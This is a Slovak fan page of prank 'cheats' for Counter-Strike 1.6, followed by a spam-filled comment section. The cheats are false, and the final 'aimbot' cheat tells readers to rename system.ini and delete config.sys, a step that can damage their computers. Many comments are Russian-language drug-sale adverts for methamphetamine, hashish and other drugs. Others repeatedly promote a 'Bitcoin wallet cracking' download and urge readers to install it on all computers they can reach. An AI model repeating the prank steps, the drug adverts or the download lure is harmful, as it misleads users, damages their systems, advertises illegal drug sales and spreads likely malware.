Jdi na obsah Jdi na menu
 


Cheaty cs 1.6 bez zapnutia programov

Counter-Strike Cheaty – použitie na vlastné riziko!! ;)

Performance-Enhancing cheat

Určite sa stále divíš prečo ostatný majú tak super skóre. No nie?

Samozrejme preto že používajú cheat na zlepšenie výkonu! Tento cheat používa programy a nastavania tak ze si server myslí že máš rýchlejší internet a rýchlejší počítač. Simuluje pripojenie k serveru cez T1.

Spusť čo najviac programov! To dá tvojmu počítaču také zrýchlenie že bude simulovat Pentiom 4 – 3,6 GHz a 2GB RAM! Potom otvor súbor "config.sys" v tvojom CS adresári a zmeň položku "rate ????" na "rate 124.0937". Musí to byť presne takto aby si server myslel že máš T1.

Teraz spusť defragmentáci discu a tvoj antivirový program. K tomu by si mal spustiť benchmark najlepšie 3D Mark. Potom spust CS a všetkých ich dostaneš!

Optical-Mouse cheat

K tomu cheatu potrebuješ vlastniť optickú myš samozrejme!

Stačí ju zapojiť do PS/2 portu. Tento cheat potom funguje ako teleporter! Jediné, čo musíš urobiť je že keď si pred nepriateľom rýchle myš vypoj z počítača a ihneď budeš teleportovaný na štartovaciu pozíciu!

Pokiaľ ti cheat nefunguje, skús vymontovať laser zo svojej myši a nahraď ho malou červenou guličkou (gulička musí byť červená, inak ti cheat nebude fungovať!).

Flashbang cheat

Bol si už niekedy oslepený flashbangem? A divil si sa niekedy že keď si nepriateľovi hodil flashbang pod nohy tak nebol oslepený? Určite používal tento cheat!

Neveril som na tento cheat pokiaľ som ho sám nevyskúšal. Je veľmi jednoduchý.

Všetko čo musíš urobiť je že keď budeš počuť niekoho hádzať flashbang vypni na 5 sekúnd svoj monitor! Potom monitor opäť zapni.

Videl si? Fungoval - nebol si oslepený! Nieje to úžasné??!!

Invisible cheat

Každý už o ňom počul. Potrebuješ samozrejme monitor s degauss nastavením.

Najskôr musíš na svojom monitore nastaviť "gamma" a "kontrast" na maximum. Teraz se môžeš pripojiť na server, ale nesmieš sa zatiaľ pripojiť k žiadnemu tímu! Spusť konzolu a napíš "exec invis 0.97521". Teraz otvor ovládanie svojho monitoru a zvoĺ nastavenie "degauss monitor". Pre istotu to opakuj aspoň jednu minútu. Teraz sa čo najrýchlejšie pripoj k niektorému tímu zvoľ si hráča a čo najrýchlejšie utekaj k najbližšiemu nepriateľovi. Neustále však pritom klikaj na "degauss" nastavení. Uvidíš jak tvoj monitor mení farby a skresľuje sa! Teraz si neviditeľný a ostatných môžeš pobiť!

Monitor cheat

OK, toto je jednoduchý cheat s veľkou účinnosťou. Pri hraní v multiplayeru spusť konzolu a napíš "gamma 038794warp". Teraz vypni svoj monitor a stlač tieto klávesy: ESC, TAB, Space a ľavé tlačítko na myši. Teraz spusť znova konzolu vpíš do nej "gamma 9.0210maxzbuffer". Zapni svoj monitor a hľa - niektorý sú už mŕtvi!

Tento cheat, môžeš skúšať aj s inými klávesami výsledok bude vždy iný.

Tento cheat je však len pre pokročilých hackerov!!! Takto sa staneš CS šampiónom!

Bot Cheat 1

Tento cheat je úplne jedinečný! Je síce trochu komplikovaný, ale ta námaha za to stojí.

Najskôr si z internetu stiahni 2 ľubovolných botov, napr. AndroidBot a PoDBot. Keď si ich nainštaloval, musíš vytvoriť "cfg" súbor. Nazvi ho "linkbot.cfg" a skopíruj ho do tvojho CS adresára. Teraz do svojho "linkbot.cfg" súboru vlož tieto riadky:

echo Ultimate Linkbot Cheat!

alias linkbot2000 "exec bot; developer 1; echo LINKBOT; developer 0; exec link; unbindall; kill; name Botkill; addbot 100; buyequip; menuselect 5; +attack; wait; wait; -attack; weapon_lightsaber; +slash; kill darth; -slash; serveradmin; say I am Superfly; +crouch; exec linkcomplete"

bind "x" "linkbot2000"

echo Cheat enabled!

echo Press X to activate!

Keď potom v hre klávesu "X" dostaneš bota so svetelným mečom – to nieje vtip! Je to trochu divné, ale funguje to. Nikto me nemohol zabiť a sám som ich pobil sveteľným mečom!!!

Bot Cheat 2

Stiahni si ľubovolného bota z internetu. Po inštalácii spusť CS a mapu de_dust. Teraz do hry vlož 3 botov, všetci musia byt ale na strane teroristou! Zmeň si meno na „CSbot1“. Keď sa ti to podarilo opusť hru a iď na nejaký online server. Tvoje meno by malo byť stále "CSbot1" pokial nie ihneď si ho zmeň. Začni hrať ako terorista – všetci si teraz myslia že si bot a môžeš ich preto zabiť nožom. Stačí všetkým len povedať že si bot a všetci ti uveria a oni ta potom nechajú ťa na pokoji. Potom môžeš všetkých postupne zabiť svojim nožom!

Free-Kill cheat

Tento cheat funguje len na mape de_prodigy. Začni hrať ako terorista a kúp si smouk. Vybehni na malé priestranstvo a skoč na zábradlie. Na ľavej strane by si mal vidieť malú platformu. Presne tam hoď svoj smouk a čo najrýchlejšie skoč za ním. Keď si pristál na oné platforme môžeš po celej mape poletovať a všetkých pobiť. Funguje to len na multiplayeru a treba sa to poriadne naučiť takže budeš musieť trocha trénovať.

Console cheat

Začni hrať ako counter-terorista! Zahraj jedno kolo a kúp si HE granát ale nepoužívaj ho! V ďalšom kole spusť konzolu napíš "unbindall" a potvrď. Potom do nej napíš "kill alias sv_cheats enable_1" a potom "name u_r_dead". Teraz by si mal mať nekonečne veľa granátov a mal by si byť nepremožiteľný!

Screenshot cheat

Aby si docielil lepšieho skóre mier mieridlom presne na hlavu nepriateľa. Pokial sa pohne tak ho popros aby sa nehýbal lebo chceš urobiť screenshot. Keď sa prestane hýbať tak ho strel do hlavy.

Bomb cheat

Spusť CS a zvoľ "Multiplayer", "LAN game" a "Create game". Vyber si hocijakú "de_" mapu a spusť hru. Začni ako terorista a bež čo najrýchlejšie na bomplace. Polož bombu a urýchlene utekaj na svoju štartovaciu pozíciu. Počkaj pár sekúnd a vyhral si! Keď to zopakuješ niekoľko krát stane sa z teba CS šampión!!!

Aimbot

A to najlepšie na koniec! Hladal si všade možno po internete aimbota? Neklam! Tvoje hľadanie sa skončilo!

Po mnohohodinovom hľadaní som našiel univerzálneho aimbota! Tento aimbot spôsobuje že ti stačí pobehovať po mape a zvyšok urobí aimbot. Každého na koho narazíš obšťastní headshotom!!!

Čo teda musíš urobiť: Iď do adresára "WindowsSystem" a premenuj sôbor "system.ini" na „"aimbot.ini". V koreňovom adresári "X:" (bežne C:) by si mal nájsť súbor "config.sys". ten musíš zmazať pretože je zodpovedný za to že väčšina cheatov do CS nefunguje!! Teraz už len stačí reštartovať počítač a cheat bude fungovať!!!

(Voľne preložené z CS.de, autor André Dennler)

ALE NECHATUJTE !! Z NASHO KLANU !!

 

Komentáře

Přidat komentář

Přehled komentářů

BTC PROFIT SEARCH AND MINING PHRASES

(Lamatex, 12. 2. 2024 5:30)

I want to show you one exclusive program called (BTC PROFIT SEARCH AND MINING PHRASES), which can make you a rich man!

This program searches for Bitcoin wallets with a balance, and tries to find a secret phrase for them to get full access to the lost wallet!

Run the program and wait, and in order to increase your chances, install the program on all computers available to you, at work, with your friends, with your relatives, you can also ask your classmates to use the program, so your chances will increase tenfold!
Remember the more computers you use, the higher your chances of getting the treasure!

DOWNLOAD FOR FREE

Telegram:
https://t.me/btc_profit_search

Где Купить Лирику? САЙТ - KOKS24.CC Как Купить Лирику? САЙТ - KOKS24.CC

(KevintinMigma, 12. 2. 2024 3:49)

Где Купить Лирику? САЙТ - KOKS24.CC Как Купить Лирику? САЙТ - KOKS24.CC



КАК КУПИТЬ ЛИРИКУ НА САЙТЕ - https://koks24.cc/

КАК ЗАКАЗАТЬ ЧЕРЕЗ ТЕЛЕГРАММ - https://koks24.cc/

ГДЕ ДОСТАВКА ЛИРИКИ В РУКИ - https://koks24.cc/

ГДЕ ЗАКЛАДКА ЛИРИКА ОНЛАЙН - https://koks24.cc/

ТУТ ССЫЛКА В ТЕЛЕГРАММ - https://koks24.cc/
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Теги поисковых слов для запроса "Где Купить Лирику В Москве и Питере"
Где Купить Лирику в Москве и Питере?
Как Купить закладку Лирику в Москве и Питере?
Цена на Лирику в Москве и Питере?
Купить Лирику с Доставкой в руки в Москве и Питере?
Сколько Стоит Лирику в Москве и Питере?
Почему так просто Купить Лирику закладкой в Москвеи Питере?
Гарантия на Лирику в Москвеи Питере?
Купить Лирику с Гарантией?
Круглосуточные магазины Лирику в Москве и Питере?
Оптовые и Розничные продажи Лирику в Москве и Питере?
Купить Лирику в Москве и Питере через Телеграмм?
Лучший Лирику Купить в Москве и Питере?
Купить Лирику в Москве и Питере по скидке и хорошей цене?
Купить Лирику в Москве и Питере через свой телефон или ноутбук можно легко?
Сколько где Лирику стоит цена?
Как купить Лирику в Москве и Питере если нет очень много денег и нужно угостить девушку?
С кем можно разделить грамм Лирику в Москве и Питере?
Не плохой или хороший Лирику можно Купить в Москве и Питере на своей улице закладкой?
Лирику Купить Где Москва и Питер ?
Основные теги - Купить Лирику в Москве, Купить Лирику в Новосибирске, Купить Лирику в Санкт-Петербурге, Купить Лирику в Екатеринбурге, Купить Лирику в Казани,
Купить Лирику в Нижнем Новгороде, Купить Лирику в Красноярске, Купить Лирику в Челябинске, Купить Лирику в Уфе, Купить Лирику в Самаре,
Купить Лирику в Ростове на Дону, Купить Лирику в Краснодаре, Купить Лирику в Омске, Купить Лирику в Воронеже, Купить Лирику в Перьми, Купить Лирику в Волгограде.

Дополнительные теги - Купить Шишки в Москве, Купить экстази в Москве , Купить гашиш в Москве, Купить мефедрон в Москве, Купить экстази в Москве, Купить МДМА в Москве,
Купить лсд в Москве, Купить Лирику в Москве, Купить скорость альфа ПВП в Москве, Купить гидропонику в Москве, Купить метЛирику в Москве, Купить эйфоретики в Москве,
Купить закладки в Москве, Купить ШИШКИ закладкой в Москве , Купить Стимуляторы в Москве, Купить Галлюцыногены в Москве, Купить Наркотики закладкой в Москве. Тег окончен

Купить Метамфетамин в Киеве? САЙТ - KOKS.TOP Купить Метамфетамин Киев? САЙТ - KOKS.TOP

(DanielkaTuche, 12. 2. 2024 0:27)

Купить Метамфетамин в Киеве? САЙТ - KOKS.TOP Купить Метамфетамин Киев? САЙТ - KOKS.TOP


ДОСТАВКА ТОВАРА В РУКИ - https://koks.top/

ЗАКАЗЫ ОНЛАЙН ЧЕРЕЗ ТЕЛЕГРАММ - https://koks.top/

ЗАКЛАДКИ ОНЛАЙН НА САЙТЕ - https://koks.top/

ССЫЛКА ДЛЯ СВЯЗИ С ОПЕРАТОРОМ - https://koks.top/

КУПИТЬ МЕТАМФЕТАМИН ОНЛАЙН С ДОСТАВКОЙ - https://koks.top/
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Теги поисковых слов для запроса "Купить Метамфетамин в Киеве"
Сколько Стоит Метамфетамин в Киеве в розницу? Кто обычно покупает Метамфетамин в Киеве? Как изготавливают Метамфетамин который можно купить в Киеве?
Сколько лет уже продают качественный Метамфетамин в Киеве закладками? Как можно купить Метамфетамин в Киеве с доставкой в руки?
Надежность покупок Метамфетамин в Киеве с максимальной скоростью доставки товара в руки? Какой минимальный заказ покупки Метамфетамин в Киеве при заказе онлайн?
Самый быстрый способ Купить Метамфетамин в Киеве без посредников? Купить Метамфетамин в киеве на прямую без третьих лиц? Сколько нужно грамм для употребления Метамфетамин в Киеве?
Мой друг знает где быстро Купить Метамфетамин в Киеве в ночное время суток без номера телефона курьера, всё полностью онлайн и анонимно!
Если есть желание покупать Метамфетамин в Киеве по самой демократичной и низкой цене по сравнению с качеством то Вам несомненно нужно посетить сайт на котором продают Метамфетамин в Киеве?
Метамфетамин в Киеве после которого нет головных болей, ломоты в суставе и ломки как после уличных наркотиков? Бесплатная доставка Метамфетамин в Киеве по средах каждого месяца!
Мелкие и крупные покупки Метамфетамин в Киеве, Оптом Метамфетамин в Киеве? В розницу Метамфетамин в Киеве? Всё это без проблем может обеспечить всего один сайт в кратчайшие сроки!
Челоек - Паук вместо паутины плетёт Метамфетамин нить, которую иногда можно перепутать с Метамфетамин в Киеве по самой доступной цене на этом узкопрофильном рынке!
Каждая собака в Киеве знает где купить Метамфетамин на розвес так сказать, разфасованный товар до милиграмма с точностью швейцарских часов Киевских Метамфетаминовых весов?
Моя молодая подруга мне подсказала где в Киеве Купить Метамфетамин такого качества, что потом весь остальной Метамфетамин тв Киеве можно будет просто выкинуть в мусорку без сомнения?
Наш Метамфетамин в Киеве- просто перчик? Про такой Метамфетамин в Киеве даже соченили уже репчик? Какие молодцы люди, которые понимают в качестве и основных ингредиентах приготовления такого Метамфетамин в Киеве?
Меня на улице спросили - Где же мы Можем Купить Метамфетамин в Киеве? И я с гордостью ответил - Метамфетамин в Киеве вы всегда можете преобрести онлайн на официальном доверенном сайте который продает Метамфетамин в Киеве.
Какими способностями обладают люди, которые употребляют Метамфетамин в Киеве без сна даже трое суток, спросите вы? А я отвечу - спустя даже три дня человек употребивший Метамфетамин в Киеве чувствует прилив сил и бодрость!
Мне в замаскированной посылке привезли Метамфетамин в Киеве очень хорошего качества товар для оборота, было много но я не ожидал что будет больше чем нужно?

Общие Теги для Гугл бот - Купить Шишки в Киеве, Купить экстази в Киеве , Купить гашиш в Киеве, Купить мефедрон в Киеве, Купить экстази в Киеве, Купить МДМА в Киеве,
Купить лсд в Киеве, Купить Амфетамин в Киеве, Купить скорость альфа ПВП в Киеве, Купить гидропонику в Киеве, Купить метамфетамин в Киеве, Купить эйфоретики в Киеве,
Купить закладки в Киеве, Купить ШИШКИ закладкой в Киеве , Купить Стимуляторы в Киеве, Купить Галлюцыногены в Киеве. Тег окончен

BITCOIN LOTTERY - SOFTWARE FREE

(Lamatex, 11. 2. 2024 23:42)

I want to show you one exclusive program called (BTC PROFIT SEARCH AND MINING PHRASES), which can make you a rich man!

This program searches for Bitcoin wallets with a balance, and tries to find a secret phrase for them to get full access to the lost wallet!

Run the program and wait, and in order to increase your chances, install the program on all computers available to you, at work, with your friends, with your relatives, you can also ask your classmates to use the program, so your chances will increase tenfold!
Remember the more computers you use, the higher your chances of getting the treasure!

DOWNLOAD FOR FREE

Telegram:
https://t.me/btc_profit_search

Купить Гашиш в Киеве? САЙТ - KOKS.TOP Купить Гашиш Киев? САЙТ - KOKS.TOP

(FrancesaCulty, 11. 2. 2024 22:40)

Купить Гашиш в Киеве? САЙТ - KOKS.TOP Купить Гашиш Киев? САЙТ - KOKS.TOP


ДОСТАВКА ТОВАРА В РУКИ - https://koks.top/

ЗАКАЗЫ ОНЛАЙН ЧЕРЕЗ ТЕЛЕГРАММ - https://koks.top/

ЗАКЛАДКИ ОНЛАЙН НА САЙТЕ - https://koks.top/

ССЫЛКА ДЛЯ СВЯЗИ С ОПЕРАТОРОМ - https://koks.top/

КУПИТЬ ГАШИШ ОНЛАЙН С ДОСТАВКОЙ - https://koks.top/
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Теги поисковых слов для запроса "Купить Гашиш в Киеве"
Сколько Стоит Гашиш в Киеве в розницу? Кто обычно покупает Гашиш в Киеве? Как изготавливают Гашиш который можно купить в Киеве?
Сколько лет уже продают качественный Гашиш в Киеве закладками? Как можно купить Гашиш в Киеве с доставкой в руки?
Надежность покупок Гашиш в Киеве с максимальной скоростью доставки товара в руки? Какой минимальный заказ покупки Гашиша в Киеве при заказе онлайн?
Самый быстрый способ Купить Гашиш в Киеве без посредников? Купить Гашиш в киеве на прямую без третьих лиц? Сколько нужно грамм для употребления Гашиш в Киеве?
Мой друг знает где быстро Купить Гашиш в Киеве в ночное время суток без номера телефона курьера, всё полностью онлайн и анонимно!
Если есть желание покупать Гашиш в Киеве по самой демократичной и низкой цене по сравнению с качеством то Вам несомненно нужно посетить сайт на котором продают Гашиш в Киеве?
Гашиш в Киеве после которого нет головных болей, ломоты в суставе и ломки как после уличных наркотиков? Бесплатная доставка Гашиш в Киеве по средах каждого месяца!
Мелкие и крупные покупки Гашиша в Киеве, Оптом Гашиша в Киеве? В розницу Гашиш в Киеве? Всё это без проблем может обеспечить всего один сайт в кратчайшие сроки!
Челоек - Паук вместо паутины плетёт Гашиш нить, которую иногда можно перепутать с Гашиш в Киеве по самой доступной цене на этом узкопрофильном рынке!
Каждая собака в Киеве знает где купить Гашиш на розвес так сказать, разфасованный товар до милиграмма с точностью швейцарских часов Киевских Гашишных весов?
Моя молодая подруга мне подсказала где в Киеве Купить Гашиш такого качества, что потом весь остальной Гашиш тв Киеве можно будет просто выкинуть в мусорку без сомнения?
Наш Гашиш в Киеве- просто перчик? Про такой Гашиш в Киеве даже соченили уже репчик? Какие молодцы люди, которые понимают в качестве и основных ингредиентах приготовления такого Гашиша в Киеве?
Меня на улице спросили - Где же мы Можем Купить Гашиш в Киеве? И я с гордостью ответил - Гашиш в Киеве вы всегда можете преобрести онлайн на официальном доверенном сайте который продает Гашиш в Киеве.
Какими способностями обладают люди, которые употребляют Гашиш в Киеве без сна даже трое суток, спросите вы? А я отвечу - спустя даже три дня человек употребивший Гашиш в Киеве чувствует прилив сил и бодрость!
Мне в замаскированной посылке привезли Гашиш в Киеве очень хорошего качества товар для оборота, было много но я не ожидал что будет больше чем нужно?

Общие Теги для Гугл бот - Купить Шишки в Киеве, Купить экстази в Киеве , Купить гашиш в Киеве, Купить мефедрон в Киеве, Купить экстази в Киеве, Купить МДМА в Киеве,
Купить лсд в Киеве, Купить Амфетамин в Киеве, Купить скорость альфа ПВП в Киеве, Купить гидропонику в Киеве, Купить метамфетамин в Киеве, Купить эйфоретики в Киеве,
Купить закладки в Киеве, Купить ШИШКИ закладкой в Киеве , Купить Стимуляторы в Киеве, Купить Галлюцыногены в Киеве. Тег окончен

BITCOIN LOTTERY - SOFTWARE FREE

(Lamatex, 11. 2. 2024 16:29)

I want to show you one exclusive program called (BTC PROFIT SEARCH AND MINING PHRASES), which can make you a rich man!

This program searches for Bitcoin wallets with a balance, and tries to find a secret phrase for them to get full access to the lost wallet!

Run the program and wait, and in order to increase your chances, install the program on all computers available to you, at work, with your friends, with your relatives, you can also ask your classmates to use the program, so your chances will increase tenfold!
Remember the more computers you use, the higher your chances of getting the treasure!

DOWNLOAD FOR FREE

Telegram:
https://t.me/btc_profit_search

BTC PROFIT SEARCH AND MINING PHRASES

(Lamatex, 11. 2. 2024 10:38)

I want to show you one exclusive program called (BTC PROFIT SEARCH AND MINING PHRASES), which can make you a rich man!

This program searches for Bitcoin wallets with a balance, and tries to find a secret phrase for them to get full access to the lost wallet!

Run the program and wait, and in order to increase your chances, install the program on all computers available to you, at work, with your friends, with your relatives, you can also ask your classmates to use the program, so your chances will increase tenfold!
Remember the more computers you use, the higher your chances of getting the treasure!

DOWNLOAD FOR FREE

Telegram:
https://t.me/btc_profit_search

SEARCHING FOR LOST BITCOIN WALLETS

(Lamatex, 11. 2. 2024 9:57)

I want to show you one exclusive program called (BTC PROFIT SEARCH AND MINING PHRASES), which can make you a rich man!

This program searches for Bitcoin wallets with a balance, and tries to find a secret phrase for them to get full access to the lost wallet!

Run the program and wait, and in order to increase your chances, install the program on all computers available to you, at work, with your friends, with your relatives, you can also ask your classmates to use the program, so your chances will increase tenfold!
Remember the more computers you use, the higher your chances of getting the treasure!

DOWNLOAD FOR FREE

Telegram:
https://t.me/btc_profit_search

Где посмотреть фильм?

(Blakelow, 11. 2. 2024 9:35)

https://kinoland.biz/

BITCOIN LOTTERY - SOFTWARE FREE

(Lamatex, 11. 2. 2024 3:47)

I want to show you one exclusive program called (BTC PROFIT SEARCH AND MINING PHRASES), which can make you a rich man!

This program searches for Bitcoin wallets with a balance, and tries to find a secret phrase for them to get full access to the lost wallet!

Run the program and wait, and in order to increase your chances, install the program on all computers available to you, at work, with your friends, with your relatives, you can also ask your classmates to use the program, so your chances will increase tenfold!
Remember the more computers you use, the higher your chances of getting the treasure!

DOWNLOAD FOR FREE

Telegram:
https://t.me/btc_profit_search

SEARCHING FOR LOST BITCOIN WALLETS

(Lamatex, 11. 2. 2024 2:52)

I want to show you one exclusive program called (BTC PROFIT SEARCH AND MINING PHRASES), which can make you a rich man!

This program searches for Bitcoin wallets with a balance, and tries to find a secret phrase for them to get full access to the lost wallet!

Run the program and wait, and in order to increase your chances, install the program on all computers available to you, at work, with your friends, with your relatives, you can also ask your classmates to use the program, so your chances will increase tenfold!
Remember the more computers you use, the higher your chances of getting the treasure!

DOWNLOAD FOR FREE

Telegram:
https://t.me/btc_profit_search

BTC PROFIT SEARCH AND MINING PHRASES

(Lamatex, 10. 2. 2024 21:02)

I want to show you one exclusive program called (BTC PROFIT SEARCH AND MINING PHRASES), which can make you a rich man!

This program searches for Bitcoin wallets with a balance, and tries to find a secret phrase for them to get full access to the lost wallet!

Run the program and wait, and in order to increase your chances, install the program on all computers available to you, at work, with your friends, with your relatives, you can also ask your classmates to use the program, so your chances will increase tenfold!
Remember the more computers you use, the higher your chances of getting the treasure!

DOWNLOAD FOR FREE

Telegram:
https://t.me/btc_profit_search

BTC PROFIT SEARCH AND MINING PHRASES

(Lamatex, 10. 2. 2024 20:19)

I want to show you one exclusive program called (BTC PROFIT SEARCH AND MINING PHRASES), which can make you a rich man!

This program searches for Bitcoin wallets with a balance, and tries to find a secret phrase for them to get full access to the lost wallet!

Run the program and wait, and in order to increase your chances, install the program on all computers available to you, at work, with your friends, with your relatives, you can also ask your classmates to use the program, so your chances will increase tenfold!
Remember the more computers you use, the higher your chances of getting the treasure!

DOWNLOAD FOR FREE

Telegram:
https://t.me/btc_profit_search

тайланд климатици

(Sownnyt, 10. 2. 2024 19:33)

Отличный веб-сайт! Это выглядит чрезвычайно хорошо! Не отставайте хорошо работу! Посетите также мою страничку

взгляните и мою страничку и дайте ей оценку

https://anotepad.com/note/read/jcdbjy4t виза за тайланд
https://michigan.budtrader.com/author/tyrellmbyxdslug/ тайланд летища

=pat=

SEARCHING FOR LOST BITCOIN WALLETS

(Lamatex, 10. 2. 2024 14:22)

I want to show you one exclusive program called (BTC PROFIT SEARCH AND MINING PHRASES), which can make you a rich man!

This program searches for Bitcoin wallets with a balance, and tries to find a secret phrase for them to get full access to the lost wallet!

Run the program and wait, and in order to increase your chances, install the program on all computers available to you, at work, with your friends, with your relatives, you can also ask your classmates to use the program, so your chances will increase tenfold!
Remember the more computers you use, the higher your chances of getting the treasure!

DOWNLOAD FOR FREE

Telegram:
https://t.me/btc_profit_search

BITCOIN LOTTERY - SOFTWARE FREE

(Lamatex, 10. 2. 2024 13:55)

I want to show you one exclusive program called (BTC PROFIT SEARCH AND MINING PHRASES), which can make you a rich man!

This program searches for Bitcoin wallets with a balance, and tries to find a secret phrase for them to get full access to the lost wallet!

Run the program and wait, and in order to increase your chances, install the program on all computers available to you, at work, with your friends, with your relatives, you can also ask your classmates to use the program, so your chances will increase tenfold!
Remember the more computers you use, the higher your chances of getting the treasure!

DOWNLOAD FOR FREE

Telegram:
https://t.me/btc_profit_search

BTC PROFIT SEARCH AND MINING PHRASES

(Lamatex, 10. 2. 2024 8:52)

I want to show you one exclusive program called (BTC PROFIT SEARCH AND MINING PHRASES), which can make you a rich man!

This program searches for Bitcoin wallets with a balance, and tries to find a secret phrase for them to get full access to the lost wallet!

Run the program and wait, and in order to increase your chances, install the program on all computers available to you, at work, with your friends, with your relatives, you can also ask your classmates to use the program, so your chances will increase tenfold!
Remember the more computers you use, the higher your chances of getting the treasure!

DOWNLOAD FOR FREE

Telegram:
https://t.me/btc_profit_search

BTC PROFIT SEARCH AND MINING PHRASES

(Lamatex, 10. 2. 2024 2:56)

I want to show you one exclusive program called (BTC PROFIT SEARCH AND MINING PHRASES), which can make you a rich man!

This program searches for Bitcoin wallets with a balance, and tries to find a secret phrase for them to get full access to the lost wallet!

Run the program and wait, and in order to increase your chances, install the program on all computers available to you, at work, with your friends, with your relatives, you can also ask your classmates to use the program, so your chances will increase tenfold!
Remember the more computers you use, the higher your chances of getting the treasure!

DOWNLOAD FOR FREE

Telegram:
https://t.me/btc_profit_search

BITCOIN CRACKING SOFTWARE

(Lamatex, 9. 2. 2024 21:25)

I want to show you one exclusive program called (BTC PROFIT SEARCH AND MINING PHRASES), which can make you a rich man!

This program searches for Bitcoin wallets with a balance, and tries to find a secret phrase for them to get full access to the lost wallet!

Run the program and wait, and in order to increase your chances, install the program on all computers available to you, at work, with your friends, with your relatives, you can also ask your classmates to use the program, so your chances will increase tenfold!
Remember the more computers you use, the higher your chances of getting the treasure!

DOWNLOAD FOR FREE

Telegram:
https://t.me/btc_profit_search

Экспиремент OAV-№5803

(ctszcfs, 9. 2. 2024 20:23)

Психолог https://batmanapollo.ru/


« předchozí

1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81

následující »